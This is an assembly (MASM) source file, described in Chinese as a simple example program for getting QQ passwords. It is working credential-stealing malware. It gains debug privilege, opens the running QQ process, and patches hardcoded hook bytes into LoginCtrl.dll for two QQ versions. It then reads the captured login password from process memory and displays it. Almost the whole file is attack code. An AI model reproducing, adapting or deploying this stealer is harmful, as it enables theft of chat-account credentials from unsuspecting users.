qq.asm

简单获取QQ密码的示例程序

		.386
		.model flat, stdcall
		option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include		windows.inc
include		user32.inc
includelib	user32.lib
include		kernel32.inc
includelib	kernel32.lib
include		advapi32.inc
includelib	advapi32.lib
include		comctl32.inc
includelib	comctl32.lib
include		psapi.inc              
includelib	psapi.lib




ID_TIMER1    equ    10
DLG_MAIN    equ   101
IDC_EDT1        equ     1001
ICO_MAIN     equ    99
IDC_btExit    equ    1000
.data
db2007        db        8Dh,45h
db2008        db        6Ch,88h    
dbPatched1    db        0E9h,4Fh,24h,01h,00h,90h,90h,90h,90h,90h
dbPatched2    db        52h, 0BAh, 0FFh, 0AFh, 12h, 00h, 03h, 0D3h, 36h, 88h, 0Ah, 5Ah, 8Dh, 45h, 0D4h, 50h, 8Dh, 85h, 58h, 0FFh, 0FFh, 0FFh, 0E9h, 9Bh, 0DBh, 0FEh, 0FFh, 90h
dbPatched3    db        0E9h, 0E5h, 34h, 01h, 00h, 90h, 90h, 90h, 90h, 90h
dbPatched4    db        52h, 0BAh, 0FFh, 0AFh, 12h, 00h, 03h, 0D3h, 36h, 88h, 0Ah, 5Ah, 8Dh, 45h, 0D4h, 50h, 8Dh, 85h, 58h, 0FFh, 0FFh, 0FFh, 0E9h, 05h, 0CBh, 0FEh, 0FFh
dbNull        db        00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h 
.const
szWinName	db	'QQ用户登录',0
szMsg		db	'QQ已启动',0
szmodname	db	'LoginCtrl.dll',0
szznotrun	db	'QQ未运行',0
szdebp		db	'SeDebugPrivilege',0
.data?

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        .data?

hInstance        dd        ?
hWinMain        dd        ?
idTimer        dd        ?
QQpid        dd        ?
hQQ        dd        ?
modArr        db        1024 dup(?)
dwNumMod    dd        ?
myModule                 MODULEENTRY32  <?>
hSnapShot    dd        ?
QQpwd        db        22 dup(?)
dbOldBytes    db        2 dup (?)
.code
_strlen		proc uses edi String:dword
		mov	edi,String
		mov	al,0
		mov	ecx,0FFFFFFFFh
		repne	scasb
		sub	ecx,0FFFFFFFFh
		neg	ecx
		dec	ecx
		mov	eax,ecx
		ret
_strlen		endp

_EnablePrivilege	proc szPriv:dword,bFlags:dword
			local	hToken
			local	tkp:TOKEN_PRIVILEGES

			invoke	GetCurrentProcess
			mov	ebx,eax
			invoke	OpenProcessToken, ebx,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hToken
			invoke	LookupPrivilegeValue,NULL,szPriv,addr tkp.Privileges.Luid
			mov	tkp.PrivilegeCount,1
			xor	eax,eax
			.if	bFlags
				mov	eax,SE_PRIVILEGE_ENABLED				
			.endif
			mov	tkp.Privileges.Attributes,eax
			invoke	AdjustTokenPrivileges,hToken,FALSE,addr tkp,0,0,0
			push	eax
			invoke	CloseHandle,hToken
			pop	eax
			ret
_EnablePrivilege	endp

_ProcTimer	proc	uses ebx edi esi _hWnd,_uMsg,_idEvent,_dwTime
		.if !hQQ
			invoke	FindWindowA,NULL,offset szWinName
			.if eax
				invoke	GetWindowThreadProcessId,eax,addr QQpid
				invoke	OpenProcess,PROCESS_ALL_ACCESS,FALSE,QQpid
				mov	hQQ,eax
				invoke	SetWindowText,hWinMain,offset szMsg
				invoke	CreateToolhelp32Snapshot,TH32CS_SNAPALL,QQpid
				mov	hSnapShot,eax
				mov	myModule.dwSize,sizeof myModule
				invoke	Module32First,hSnapShot,addr myModule
				jmp	cmp1
			NextModule:
				invoke	Module32Next,hSnapShot,addr myModule
			cmp1:
				invoke	lstrcmp,addr myModule.szModule,offset szmodname
				cmp	eax,0
				jnz	NextModule

				mov	ebx,myModule.modBaseAddr
				add	ebx,16396h;2008:16de0,200716396
				invoke	ReadProcessMemory,hQQ,ebx,addr dbOldBytes,2,NULL
				mov	ax,word ptr dbOldBytes
				.if ax == word ptr db2007
					invoke	WriteProcessMemory,hQQ,ebx,addr dbPatched1,10,NULL
					add	ebx,12454h	;2008:134ea,2007:12454h
					invoke	WriteProcessMemory,hQQ,ebx,addr dbPatched2,28,NULL
					invoke	WriteProcessMemory,hQQ,12B000h,0,16,NULL
				.elseif	ax == word ptr db2008
					add	ebx,0A4Ah
					invoke	WriteProcessMemory,hQQ,ebx,addr dbPatched3,10,NULL
					add	ebx,134EAh
					invoke	WriteProcessMemory,hQQ,ebx,addr dbPatched4,27,NULL
					invoke	WriteProcessMemory,hQQ,12B000h,addr dbNull,16h,NULL

				.endif
			.endif
			.else 
				invoke	ReadProcessMemory,hQQ,12B000h,addr QQpwd,sizeof QQpwd,NULL
				invoke	_strlen,addr QQpwd
				.if eax
					invoke	SetDlgItemText,hWinMain,IDC_EDT1,addr QQpwd
					invoke	WriteProcessMemory,hQQ,12B000h,addr dbNull,16h,NULL

				.endif
				invoke	FindWindowA,NULL,offset szWinName
				.if	!eax
					mov	hQQ,0
					invoke	SetWindowText,hWinMain,offset szznotrun
				.endif
		.endif


		ret
_ProcTimer	endp

_ProcDlgMain    proc    uses ebx edi esi hWnd,wMsg,wParam,lParam

        mov    eax,wMsg
        .if    eax == WM_COMMAND
            mov    eax,wParam
            .if    ax == IDC_btExit
                invoke    EndDialog,hWnd,NULL
            .endif
        .elseif    eax == WM_CLOSE
            invoke    EndDialog,hWnd,NULL
        .elseif    eax == WM_INITDIALOG
            invoke    SetTimer,NULL,NULL,1000,addr _ProcTimer
            mov    idTimer,eax
            push    hWnd
            pop    hWinMain
            invoke     _EnablePrivilege,offset szdebp, TRUE
            invoke    SendDlgItemMessage,hWnd,IDC_EDT1,EM_SETREADONLY,TRUE,0
            invoke      SetWindowPos,hWnd,HWND_TOPMOST,0,0,0,0,SWP_NOMOVE or SWP_NOSIZE
        .else
            mov    eax,FALSE
            ret
        .endif
        mov    eax,TRUE
        ret

_ProcDlgMain    endp

start:
	invoke	GetModuleHandle,NULL
	mov	hInstance,eax
	invoke	InitCommonControls
	invoke	DialogBoxParam,hInstance,DLG_MAIN,NULL,offset _ProcDlgMain,NULL
	invoke	ExitProcess,NULL

	end	start